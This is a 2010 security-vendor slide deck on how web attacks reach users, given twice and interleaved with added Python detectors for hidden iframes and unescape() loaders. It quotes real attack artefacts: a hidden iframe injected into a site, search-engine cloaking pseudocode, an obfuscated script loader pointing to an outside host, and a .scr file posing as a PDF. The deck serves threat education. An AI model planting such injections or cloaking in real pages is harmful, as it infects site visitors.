The Anatomy of a Web Attack
Dennis Pike
Systems Engineer
Geo Specialists Lead – Americas Security
dennis.pike@bluecoat.com


                           Blue Coat Systems Confidential
                           Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered
                           in certain jurisdictions. All other product or service names are the property of their respective owners.


                                                                   © Blue Coat Systems, Inc. 2010. All Rights Reserved.
Agenda
     State of the Web
        • Top categories
        • Top attacks
     The Anatomy of a Web Attack
        • Lures to web threats
        • Examples
     Dynamic Link Analysis




Best of the Worst
     Top Web Category?
    >> Among the top ten active categories of 2009, social networking access
    accounted for 25 percent of all Web access activity

     Top Web threat?
    >> Fake Antivirus was the most successful Web threat in 2009, followed by
    the Fake Video Codec offer.
    >> New Fake AV installer programs increased from an average of 300 to
    1,462 per day in the second half of 2009. *
    >> Average lifetime of sites that redirect users to Web pages that try to
    install scareware decreased with a median lifetime dropping below 100
    hours around April 2009, below 10 hours around September 2009, and
    below one hour since January 2010. *
    * Google Inc.

Email vs Social Networking
     Do more people use email or social networking sites?
    >> According to Nielsen Co., in August 2009, 277 million people used email
    across the U.S., several European countries, Brazil and Australia, a 21 percent
    increase from the year before. But the number of users on social networking
    and other community sites jumped 31 percent to 302 million, bypassing the
    email user population by 10 percent.




Noteworthy Items
     Argument for Video (HTTP and Streaming)

     Domain               Client%      Domain               Client%
     ~Total~              100%         ~Total~              100.00%
     youtube.com          35.7800      youtube.com          36.28
     hotfile.com          7.427        rapidshare.com       6.36
     apple.com            4.901        hotfile.com          5.26
     ninjacloak.com       4.205        apple.com            3.98
     rapidshare.com       4.135        ninjacloak.com       3.97
     megaupload.com       2.977        megaupload.com       2.54
     googlevideo.com      2.66         googlevideo.com      2.33
     fbcdn.net            1.791        fbcdn.net            1.85
     mediafire.com        1.492        fileserve.com        1.75
     windowsupdate.com    1.305        playstation.net      1.74
     playstation.net      1.241        mediafire.com        1.68
     fileserve.com        1.187        windowsupdate.com    1.42
     4shared.com          1.031        zshare.net           0.78
     zshare.net           0.7793       facebook.com         0.65
     dailymotion.com      0.6476       dailymotion.com      0.62
     google.com           0.588        4shared.com          0.6
     facebook.com         0.5764       novamov.com          0.54
     novamov.com          0.5737       google.com           0.54
     microsoft.com        0.4747       farmville.com        0.52
     farmville.com        0.4626       adobe.com            0.41

     Legend: video, filesharing

Changing Web Habits

     Top 10 Categories – 2009
     WebFilter/WebPulse, 62M+ Users
        1. Social Networking
        2. Web Advertisements
        3. Search Engines/Portals
        4. Personals/Dating
        5. Pornography
        6. Computers/Internet
        7. Audio/Video Clips
        8. Adult/Mature Content
        9. Web Email
        10. Illegal/Questionable

     Social Networking
        • Moved to #1 from #2 position
        • Represents 25% of Top10 requests
     Web Email
        • Dropped to #9 from #5 position
        • Users migrating to social networking
     Cyber Crime Leverages
        • Search engine poisoning
        • Fake AV and Codec updates
        • Popular site injections
        • Death, Drama & Disaster lures
        • Health & Wealth scams

Web Threats Rising Exponentially




     2/3 of all known malicious code threats in 1 year (Symantec April’09)

     1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)


Distribution Power
     Botnet computing power to:
        Pitch worthless products
        Hijack online banking accounts
        Steal corporate data

     Top 5 Botnets in 2009

        Botnet        Peak number of active bots
        Zeus          1,070,000
        Koobface B    812,000
        Koobface D    599,000
        Monkif A      506,000
        Clickbot      375,000

     How it spreads (labels recovered from the chart): Search Results, Social Networking, Facebook, Twitter

     USA TODAY Research – March 2010

An Invitation to Crime

     1 – An automated program logs on to social network using stolen user credentials.
     2 – Program messages user’s friends asking them to click on a link to a photo or video.
     3 – Anyone who clicks on the link is asked to enable a media player needed to see the images. Running the file turns the PC into a bot.
     4 – The bot steals the PC owner’s logon credentials, starting the cycle again.

     USA TODAY Research – March 2010

Web Evolution

           Static Pages         ->   Dynamic Pages
           Dynamic Pages        ->   Interactive Pages
           Publishing Model     ->   Community Model
           Single Host Pages    ->   Multi-Host Pages
           Nice to Have         ->   Must Have

Multi-Host Pages

     [Screenshot label: SPORT]

        6      Domains
        13     Hosts
        147    Requests
        504    KB
        14.5   Seconds

Paths to Malware Infection

     [Diagram labels: Infected Site, Search Engine, Link Farms, Blogs, Forums, Relay, Bait, Malware]

End User…Infected Site

     www.inka.com
     <html>
     …
     <iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe><div id="header">
     …
     </html>

     homenameregistration.cn/in.cgi?income12

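A defender-side check for the injection shown on this slide, as an added example that is not part of the original deck: it parses a page and reports iframes that are both invisible (tiny dimensions or hidden by style) and loaded from another site. The function names, the 2-pixel threshold, the "www." site heuristic and every line of the sample page other than the slide's own iframe are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


def _px(value):
    """Parse an attribute such as '1' or '1px' into an int, else None."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "")
    return int(m.group(1)) if m else None


def _site(host):
    """Crude site key: lower-case host without a leading 'www.' (assumption)."""
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host


class _IframeAudit(HTMLParser):
    def __init__(self, page_host, max_px):
        super().__init__()
        self.page_site = _site(page_host)
        self.max_px = max_px
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        # Relative URLs have no host, so they stay on the page's own site.
        off_site = bool(host) and not (
            _site(host) == self.page_site or host.endswith("." + self.page_site)
        )
        reasons = []
        w, h = _px(a.get("width")), _px(a.get("height"))
        if w is not None and h is not None and w <= self.max_px and h <= self.max_px:
            reasons.append("tiny %dx%d frame" % (w, h))
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        # Report only frames that are invisible AND served from another site.
        if off_site and reasons:
            self.findings.append({"src": src, "host": host, "reasons": reasons})


def find_hidden_iframes(html, page_host, max_px=2):
    """Return one finding per invisible off-site iframe in the given HTML."""
    audit = _IframeAudit(page_host, max_px)
    audit.feed(html)
    audit.close()
    return audit.findings


# Constructed sample page. Only the first iframe line comes from the slide;
# the visible embed and the same-site hidden frame are made-up controls.
SAMPLE_PAGE = """<html><body>
<iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1
 style="visibility: hidden"></iframe><div id="header">
<iframe src="http://video.example.org/embed/42" width="560" height="315"></iframe>
<iframe src="/ads/tracker.html" width="0" height="0" style="display:none"></iframe>
</div></body></html>"""

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_PAGE, "www.inka.com"):
        print(finding["host"], finding["src"], "; ".join(finding["reasons"]))
```
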
Web 2.0 and Search Engines

     [Diagram labels: Forums, Blogs, Wikis, Guestbooks; WWW; Search Engine View]

Web 2.0 and Search Engines

     [Diagram labels: Links…, Words…; WWW; Search Engine View]

Hijacked Website

     xdesignstudios.com
         dir1
             index.php
                 if ("search engine") {
                     echo "…indexable content…"
                 } else {
                     echo '<body><script src="live.js"></script>'
                 }

                 …
                 id=fall+printable+coloring+pages
                 id=free+printable+easter+drawings
                 id=disney+printable+cartoon+characters
                 id=free+printable+halloween+sheets
                 id=girls+free+printable+organizer
                 id=in+store+printable+catherines+coupons
                 …
             live.js

End User…Search Engine Redirect

     index.php?id=hannah-montana-printable-birthday-invitations
     <body>
     <script src="live.js">
     </script>

     live.js
     document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75…

     http://cracksinside.com/red/gen.js

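For triage of a script like the live.js on this slide, the following added example (not part of the original deck) decodes `unescape('…')` string literals statically, without running any script, follows nested layers, and lists the `<script src>` URLs that appear. `SLIDE_FRAGMENT` is the part of the string visible on the slide; the other samples and the `redirector.example` URL are constructed placeholders, and all function names are assumptions.

```python
import re

# JavaScript unescape() accepts %XX and %uXXXX; each maps to one code point.
ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
SCRIPT_SRC = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def js_unescape(s):
    """Decode a string the way JavaScript's unescape() does.

    Malformed sequences such as '%zz' are left untouched, as in the browser.
    """
    return ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def peel(js, max_depth=5):
    """Statically decode nested unescape('...') literals.

    Returns (layers, script_urls): every decoded string in the order found,
    and the src of every <script> tag seen in any layer. max_depth bounds
    the work on deliberately deep nesting.
    """
    layers, urls = [], []
    pending = [(js, 0)]
    while pending:
        text, depth = pending.pop(0)
        for url in SCRIPT_SRC.findall(text):
            if url not in urls:
                urls.append(url)
        if depth >= max_depth:
            continue
        for m in UNESCAPE_CALL.finditer(text):
            decoded = js_unescape(m.group(2))
            layers.append(decoded)
            pending.append((decoded, depth + 1))
    return layers, urls


def escape_all(s):
    """Percent-encode every character; used only to build the samples below."""
    return "".join("%%%02X" % ord(c) for c in s)


# The visible part of the string on the slide (the slide truncates it).
SLIDE_FRAGMENT = "%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75"

# Constructed samples: the tag and its URL are placeholders, not the real payload.
SAMPLE_TAG = ('<SCRIPT    language="javascript" '
              'src="http://redirector.example/red/gen.js"></SCRIPT>')
SAMPLE_LIVE_JS = "document.write(unescape('" + escape_all(SAMPLE_TAG) + "'));"
SAMPLE_NESTED = ("document.write(unescape('"
                 + escape_all('document.write(unescape("'
                              + escape_all(SAMPLE_TAG) + '"))')
                 + "'));")

if __name__ == "__main__":
    print(repr(js_unescape(SLIDE_FRAGMENT)))
    for name, sample in (("single", SAMPLE_LIVE_JS), ("nested", SAMPLE_NESTED)):
        layers, urls = peel(sample)
        print(name, "layers:", len(layers), "script URLs:", urls)
```
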
What just happened?

     [Diagram labels: Links…, Words…; WWW; Search Engine View; Redirect]

Recent Examples - VBMania

     Email text
         www.sharedocuments.com/library/PDF_Document21.025542010.pdf

     www.sharedocuments.com/library/PDF_Document21.025542010.pdf
     members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr

Recent Examples – Fake Warez




2010-11 The Anatomy of a Web Attack

  • 1. The Anatomy of a Web Attack Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com Blue Coat Systems Confidential Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
  • 2. Agenda
      - State of the Web: top categories, top attacks
      - The Anatomy of a Web Attack: lures to web threats, examples
      - Dynamic Link Analysis
  • 3. Best of the Worst
      - Top Web Category?
        >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity.
      - Top Web threat?
        >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer.
        >> New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. *
        >> Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. *
        * Google Inc.
  • 4. Email vs Social Networking
      - Do more people use email or social networking sites?
        >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent.
  • 5. Noteworthy Items: Argument for Video (HTTP and Streaming)
      Chart legend: video, filesharing

      Domain              Client%   |  Domain              Client%
      ~Total~             100%      |  ~Total~             100.00%
      youtube.com         35.7800   |  youtube.com         36.28
      hotfile.com         7.427     |  rapidshare.com      6.36
      apple.com           4.901     |  hotfile.com         5.26
      ninjacloak.com      4.205     |  apple.com           3.98
      rapidshare.com      4.135     |  ninjacloak.com      3.97
      megaupload.com      2.977     |  megaupload.com      2.54
      googlevideo.com     2.66      |  googlevideo.com     2.33
      fbcdn.net           1.791     |  fbcdn.net           1.85
      mediafire.com       1.492     |  fileserve.com       1.75
      windowsupdate.com   1.305     |  playstation.net     1.74
      playstation.net     1.241     |  mediafire.com       1.68
      fileserve.com       1.187     |  windowsupdate.com   1.42
      4shared.com         1.031     |  zshare.net          0.78
      zshare.net          0.7793    |  facebook.com        0.65
      dailymotion.com     0.6476    |  dailymotion.com     0.62
      google.com          0.588     |  4shared.com         0.6
      facebook.com        0.5764    |  novamov.com         0.54
      novamov.com         0.5737    |  google.com          0.54
      microsoft.com       0.4747    |  farmville.com       0.52
      farmville.com       0.4626    |  adobe.com           0.41
  • 6. Changing Web Habits
      Top 10 Categories – 2009 (WebFilter/WebPulse, 62M+ Users):
        1. Social Networking
        2. Web Advertisements
        3. Search Engines/Portals
        4. Personals/Dating
        5. Pornography
        6. Computers/Internet
        7. Audio/Video Clips
        8. Adult/Mature Content
        9. Web Email
        10. Illegal/Questionable
      Social Networking:
        - Moved to #1 from #2 position
        - Represents 25% of Top10 requests
      Web Email:
        - Dropped to #9 from #5 position
        - Users migrating to social networking
      Cyber Crime Leverages:
        - Search engine poisoning
        - Fake AV and Codec updates
        - Popular site injections
        - Death, Drama & Disaster lures
        - Health & Wealth scams
  • 7. Web Threats Rising Exponentially
      - 2/3 of all known malicious code threats in 1 year (Symantec April '09)
      - 1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)
  • 8. Distribution Power
      Botnet computing power to:
        - Pitch worthless products
        - Hijack online banking accounts
        - Steal corporate data
      Top 5 Botnets in 2009 (peak number of active bots):
        Zeus          1,070,000
        Koobface B      812,000
        Koobface D      599,000
        Monkif A        506,000
        Clickbot        375,000
      How it spreads: Search Results, Facebook, Twitter, Social Networking
      Source: USA TODAY Research – March 2010
  • 9. An Invitation to Crime
      1 – An automated program logs on to social network using stolen user credentials.
      2 – Program messages user's friends asking them to click on a link to a photo or video.
      3 – Anyone who clicks on the link is asked to enable a media player needed to see the images. Running the file turns the PC into a bot.
      4 – The bot steals the PC owner's logon credentials, starting the cycle again.
      Source: USA TODAY Research – March 2010
  • 10. Web Evolution
      - Static Pages → Dynamic Pages
      - Dynamic Pages → Interactive Pages
      - Publishing Model → Community Model
      - Single Host Pages → Multi-Host Pages
      - Nice to Have → Must Have
  • 11. Multi-Host Pages (SPORT): 6 Domains, 13 Hosts, 147 Requests, 504 KB, 14.5 Seconds
  • 12. Paths to Malware Infection (diagram labels: Link Farms; Infected Site; Search Engine; Blogs, Forums; Relay; Bait; Malware)
  • 13. End User…Infected Site
      www.inka.com:
        <html> … <iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe><div id="header"> … </html>
      Hidden iframe target: homenameregistration.cn/in.cgi?income12
  • 14. Web 2.0 and Search Engines (diagram labels: Forums, Blogs, Wikis, Guestbooks, WWW, Search Engine View)
  • 15. Web 2.0 and Search Engines (diagram labels: Links…, Words…, WWW, Search Engine View)
  • 16. (no text on slide)
  • 17. (no text on slide)
  • 18. Hijacked Website
      xdesignstudios.com, dir1: index.php, live.js
      index.php:
        if ("search engine") {
          echo "…indexable content…"
        } else {
          echo '<body><script src="live.js"></script>'
        }
      index.php query strings:
        …
        id=fall+printable+coloring+pages
        id=free+printable+easter+drawings
        id=disney+printable+cartoon+characters
        id=free+printable+halloween+sheets
        id=girls+free+printable+organizer
        id=in+store+printable+catherines+coupons
        …
  • 19. End User…Search Engine Redirect
      index.php?id=hannah-montana-printable-birthday-invitations:
        <body> <script src="live.js"> </script>
      live.js:
        document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75…
      http://cracksinside.com/red/gen.js
  • 20. What just happened? (diagram labels: Links…, Words…, WWW, Search Engine View, Redirect)
  • 21. Recent Examples - VBMania
      Email text: www.sharedocuments.com/library/PDF_Document21.025542010.pdf
      members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr
  • 22. Recent Examples – Fake Warez
  • 23. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
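
A static triage check for the two injection patterns on slides 13 and 19 (a hidden off-site iframe and a document.write(unescape(...)) loader). This is an added example, not part of the original deck; the sample page, the sample script, the .example hosts and the function names are all constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed samples modelled on slides 13 and 19; hosts use the reserved .example TLD.
SAMPLE_PAGE = (
    '<html><body>'
    '<iframe src="http://tracker.example/in.cgi?x" width=1 height=1 '
    'style="visibility: hidden"></iframe>'
    '<iframe src="/local/widget.html" width="300" height="250"></iframe>'
    '<div id="header"></div></body></html>'
)
SAMPLE_JS = ("document.write(unescape('%3C%53%43%52%49%50%54%20src%3D%22"
             "http%3A//cdn.example/gen.js%22%3E'));")


class HiddenIframeFinder(HTMLParser):
    """Collect iframes that load another host and are invisible or 0/1 px in size."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = urlparse(a.get("src", "")).hostname  # None for relative URLs
        off_site = host is not None and host != self.page_host
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        tiny = any(a.get(d, "").strip() in ("0", "1") for d in ("width", "height"))
        if off_site and (hidden or tiny):
            self.findings.append(a["src"])


def find_hidden_iframes(html, page_host):
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings


def decode_unescape_payloads(js):
    """Percent-decode string literals passed to unescape() so the written markup is readable.
    Handles %XX only; %uXXXX sequences accepted by JavaScript's unescape are left as-is."""
    pattern = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
    return [unquote(m.group(2)) for m in pattern.finditer(js)]
```

The iframe check only sees markup present in the served HTML, so a page that cloaks by visitor type (slide 18) has to be fetched the way an ordinary browser would fetch it.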